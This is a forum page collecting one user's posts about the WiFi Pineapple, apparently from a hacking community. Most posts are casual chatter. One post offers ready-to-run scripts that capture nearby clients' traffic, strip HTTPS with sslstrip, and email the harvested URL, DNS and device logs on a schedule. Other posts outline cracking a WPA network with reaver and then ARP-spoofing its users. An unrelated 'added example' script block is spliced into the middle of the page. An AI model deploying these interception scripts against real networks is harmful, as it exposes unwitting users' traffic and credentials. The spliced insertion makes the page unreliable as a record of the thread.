
telot

Dedicated Members
  • Posts: 803
  • Joined
  • Last visited
  • Days Won: 12

Posts posted by telot

  1. If Seb brings a thread off-topic, that means it's ok, right? :)

    To be honest Seb, I haven't any reason to upgrade. Everything I want from the pineapple works wonderfully. Until something game changing comes along, I see lots of risk in upgrading (since I have everything tuned perfectly right now) and no benefit.

    telot

  2. It's picky, but it does look like they've fixed it. You have to do everything exactly in order and if you don't, you have to hard restart the box. The other major downside is, I lose the ability to access 172.16.42.1/pineapple after ICS is turned on. I have to ssh in, run my tcpdump and sslstrip, make sure it's working, then turn on ICS. After that I just rely on my cronjob'd email reports to make sure everything's working ok, which is alright but also kinda sucks. Mac ICS is better now (since it at least kind of works with the stock IP) but still lacks the convenience and versatility that Windows and Linux have.

    FYI I'm running ML on a 2012 air with thunderbolt eth adapter and 2.5 firmware.

    telot

  3. I'm not really sure what you mean leapole. If you're saying that you can set up the SSID of the pineapple to be the same as the WPA-encrypted access point, then somehow "set the network key" the same as the WPA-encrypted access point, deauth said access point and replace it with the pineapple's own WPA-encrypted one with the same SSID? I'd love to know how to do this, because right now the pineapple is not set up to do anything with encryption as far as I know.

    What I think the OP is after is this: some access point has wpa and he wants to leave his pineapple there so that it can crack the wpa (assuming via reaver), join the wpa network, then execute some MITM attacks (cap all the packets, use sslstrip, urlsnarf, what have you) on the still-working original wpa encrypted access point.

    telot

  4. No, Interceptor is not what you're looking for - the Interceptor (and the Mark IV conversion to Interceptor - which is not currently available but promised) is for wired MITM (ethernet). I'm not sure if the pineapple has wpa_supplicant, but it might be available in opkg. Do the following:

    opkg update

    opkg install wpa-supplicant

    If that works, you're golden. Hack the WPA key with reaver, then connect to the AP, then run some arpspoof (it should be part of the dsniff package - opkg install dsniff).

    I don't have my markIV handy, so I'm just guessing about all this stuff. Give it a try and report back here!

    telot

  5. Hey Neworld - thank you for the DC19 link, I hadn't seen this (FREAKIN AMAZING) trick before. It seems there's some dependencies, aside from gcc...I found these on samsclass.info (which has great tuts on THC RA attacks):

    libnet-pcap-perl

    libpcap0.8-dev

    libssl-dev

  6. @WatskeBart - you figured out my grand plot!! I wanted all the logs! DRINK ALL THE BOOZE - LOG ALL THE THINGS!

    I'm glad you guys enjoy though - feel free to post any scripts you can't live without!

    telot

  7. Good morning everyone!

    It's been a while since I've contributed, so this is way overdue. I see a lot of new faces on these forums, which is a wonderful thing! I've been jam packed busy, so there's nothing too fun to share at the moment, but hopefully some of you will find these simple scripts useful. They are designed with a dropbox/sniffer application in mind. Sniff all the packets and keep me abreast of what's going on. Enjoy!

    dumpNstrip.sh (I either run this upon startup or keep it bound to the WPS button for great win)

    [CODE]#!/bin/sh
    # Date-stamp the capture so the report script below finds the same file
    TODAY=$(date +"%m-%d-%y")
    # Capture the client subnet to USB in the background
    tcpdump -i eth0 -w /usb/cap.$TODAY.pcap -n net 172.16.42.0/24 &
    # Redirect HTTP and HTTPS to the port sslstrip listens on (default 10000)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
    sslstrip -w /usb/sslstrip.log &
    [/CODE]

    telots-emailreport.sh (I keep this on a cron job for once every 20 minutes - keeps me up to date on the cap file size, number of "guests", and system stability)

    [CODE]#!/bin/sh
    TODAY=$(date +"%m-%d-%y")
    REPORT=/usb/emailreport.log

    # Start a fresh report each run (-f so a missing file is not an error)
    rm -f $REPORT

    # Size of today's capture file
    du -h /usb/cap.$TODAY.pcap > $REPORT

    cat /www/pineapple/logs/associations.log >> $REPORT

    # Copy the urlsnarf log, then restart urlsnarf (helper scripts sit next to this one)
    cat /www/pineapple/logs/urlsnarf.log >> $REPORT
    ./killurlsnarf.sh
    ./starturlsnarf.sh
    cat /www/pineapple/logs/dnsspoof.log >> $REPORT

    cat /proc/net/arp >> $REPORT

    # Current "guests": DHCP leases, ARP table and the interesting KARMA lines.
    # Grouped so every command's output lands in the report, not just the last one.
    {
        cat /tmp/dhcp.leases; echo; cat /proc/net/arp; echo
        grep KARMA /tmp/karma.log | grep -v -e enabled | grep -v -e malloc | grep -v -e CTRL_IFACE | grep -v -e KARMA_STATE | grep -v -e Request
    } >> $REPORT

    ssmtp -v EMAIL@DOMAIN.com < $REPORT[/CODE]

    telot

  8. Well, if we're waxin' nostalgic...

    When I was 10 I got my first AOL account. A few months later I heard about AOHell and downloaded it. Many laughs were had at the expense of innocent chat rooms full of 1990s chumps. Soon after I too stumbled upon Netbus...again many laughs were had, this time at the expense of my parents (we had two computers that I networked). Not too long after that it was LAN parties and overclocking Celeron 566s to 850MHz with a Gorb (Golden Orb) for laughs and profit. I like to think that I've been doin it for teh lulz long before it was cool - ha!

    telot

  9. I did some tests a while back regarding range at different voltages - typical range on either 5V or 9V or 12V was 30ft in a kind of "mixed office" setting with desks, chairs, cube walls, etc. I'm sure in a wide open environment it would be greater. You can look up my old post for exact numbers of txpower, dBm, RSSI values, etc. Glad the pigtail worked for ya though!

    telot

  10. You can try any number of other ports - just make sure your firewall on your server side is port forwarding the appropriate ports. So you can either change the port on your server (/etc/ssh/sshd_config) or if your router/firewall supports it, you can do port mapping. For instance, I can map port 2020 to 22 on my server. So when I'm out in the world, I type ssh -p 2020 user@telotsawesomeserver.com and my router/firewall makes port 2020 from outside internet connect to port 22 on my inside intranet at my house. All this does is prevent script kiddies from attempting to brute force my server - security through obscurity.

    telot
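    The post above says moving sshd off port 22 cuts down brute-force noise. As an added example (not code from telot or the Pineapple project), here is a small POSIX sh script that counts "Failed password" sshd log lines per source address, so you can compare the noise before and after the port change. The log lines embedded in it are constructed samples with documentation-range addresses.

    ```shell
    #!/bin/sh
    # Added example: measure sshd brute-force noise from auth log lines.
    # SAMPLE_LOG is constructed test data, not real server output.
    SAMPLE_LOG='Jan 10 03:14:01 srv sshd[1201]: Failed password for root from 203.0.113.7 port 51234 ssh2
    Jan 10 03:14:03 srv sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2
    Jan 10 03:15:10 srv sshd[1210]: Accepted publickey for user from 198.51.100.5 port 2020 ssh2
    Jan 10 03:16:42 srv sshd[1222]: Failed password for root from 198.51.100.9 port 44410 ssh2'

    # failed_count FILE: total number of failed password attempts in FILE
    failed_count() {
        grep -c 'Failed password' "$1"
    }

    # failed_by_source FILE: print "count address" per source, busiest first
    failed_by_source() {
        grep 'Failed password' "$1" \
          | sed -n 's/.* from \([0-9.]*\) port .*/\1/p' \
          | sort | uniq -c | sort -rn \
          | awk '{print $1, $2}'
    }

    # Write the constructed sample to a temp file; on a real box point the
    # functions at /var/log/auth.log (or wherever sshd logs) instead.
    SAMPLE=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$SAMPLE"

    echo "failed attempts: $(failed_count "$SAMPLE")"
    failed_by_source "$SAMPLE"
    ```

    Run it once against a day's log on port 22 and again after the port change; a drop in the per-source counts is the obscurity benefit telot describes, and the remaining entries are the sources still worth blocking.
    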

  11. I went so far as to start creating a giant how-to website. Trouble is, I can't do it by myself with my current work and family schedule. When I've talked to Seb et al. about this, he wants us to use the wiki. The registration process is easy - there's very little vetting. Basically, from what I understand, if you post to the forums, you'll be quickly granted access to the wiki. I've done a number of how-tos (sslstrip, tcpdump, PoE cables, etc) here on the forums that I believe are still up to date, but I haven't confirmed them since 2.5, so I'm hesitant to put them up.

    A stickied thread here on the forums is nice, as we're all here anyways, but the problem is editing. If one person compiles all the info and the thread gets stickied, and that person stops visiting the forums - the information will go out of date without a way for the rest of us to fix it. The wiki solves this problem by allowing anyone to fix it at a later time.

    telot

  12. This sounds great Challenger! This has been on the community's "To Do" list for a while now! Do you have any screenshots of your work in progress? I'm sure many of us would like to take a sneak peek if possible. Can't wait to check it out

    telot

  13. Haha, need you even ask? digip rarely gives bad advice 'round these parts, as evidenced above :) Irongeek infamously redirected a "hackme.irongeek.com" back to 127.0.0.1, so anyone trying to attack it would be attacking themselves...pretty hilarious.

    telot

  14. This has happened since the Mark3 (perhaps before). It doesn't hurt anything - just looks ugly in the terminal. Call it a feature and move on!

    Just kidding, but I can see why this wouldn't be fixed anytime soon, as it's not harmful and there's so many other awesome things for Seb to work on!

    telot

  15. AOHell - first time I saw entire chat rooms get kicked out at once, I was hooked. This was back in '94 or '95.

    By 10 I was online - 12 I had bought my first issue of 2600.

    Back issues of 2600 - the community may sometimes scoff at 2600, and oftentimes scoff at Emmanuel, but the zine does a great job. When I read it today, I may not get immediately applicable technical knowledge, but it gets me into the mindset, the spirit - of what being a hacker is all about.

    telot
